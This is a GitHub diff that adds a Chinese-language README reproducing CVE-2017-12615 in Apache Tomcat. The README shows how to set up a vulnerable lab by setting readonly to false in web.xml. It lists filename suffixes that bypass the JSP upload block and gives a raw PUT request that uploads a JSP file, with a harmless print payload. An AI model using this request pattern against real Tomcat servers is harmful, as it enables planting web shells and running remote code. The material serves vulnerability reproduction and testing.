File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change 11#! -*- coding:utf-8 -*-
22__author__ = "浮萍"
3- __Date__ = "20170914 "
3+ __Date__ = "20170920 "
44
55
66'''
Original file line number Diff line number Diff line change 1+ # CVE-2017 -12615
2+ 打开tomcat下conf\web.xml文件
3+ 找到
4+ ```
5+ <servlet>
6+ <servlet-name>default</servlet-name>
7+ <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
8+ <init-param>
9+ <param-name>debug</param-name>
10+ <param-value>0</param-value>
11+ </init-param>
12+ <init-param>
13+ <param-name>listings</param-name>
14+ <param-value>false</param-value>
15+ </init-param>
16+ <load-on-startup>1</load-on-startup>
17+ </servlet>
18+
19+ ```
20+ 添加` readonly ` 为false
21+ ```
22+ <servlet>
23+ <servlet-name>default</servlet-name>
24+ <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
25+ <init-param>
26+ <param-name>debug</param-name>
27+ <param-value>0</param-value>
28+ </init-param>
29+ <init-param>
30+ <param-name>listings</param-name>
31+ <param-value>false</param-value>
32+ </init-param>
33+ <init-param>
34+ <param-name>readonly</param-name>
35+ <param-value>false</param-value>
36+ </init-param>
37+ <load-on-startup>1</load-on-startup>
38+ </servlet>
39+
40+ ```
41+
42+ 不能直接put jsp或者jspx文件
43+ 在windows下可以用` test.jsp/ ` 、` test.jsp/. ` 、` test.jsp::$DATA ` 来绕过
44+ 经过测试,最新版[ apache-tomcat-7.0.81] ( http://tomcat.apache.org/download-70.cgi ) 可以用` test.jsp/ ` 、` test.jsp/. ` 来绕过
45+
46+ ```
47+ PUT /test.jsp/ HTTP/1.1
48+ Host: 192.168.135.132:8080
49+ Content-Length: 25
50+
51+ <%out.println("test");%>
52+
53+ ```
54+ ![ 最新版利用] ( https://raw.githubusercontent.com/fupinglee/MyPython/master/exploit/CVE-2017-12615/tomcat-7.0.81.jpg )
You can’t perform that action at this time.
0 commit comments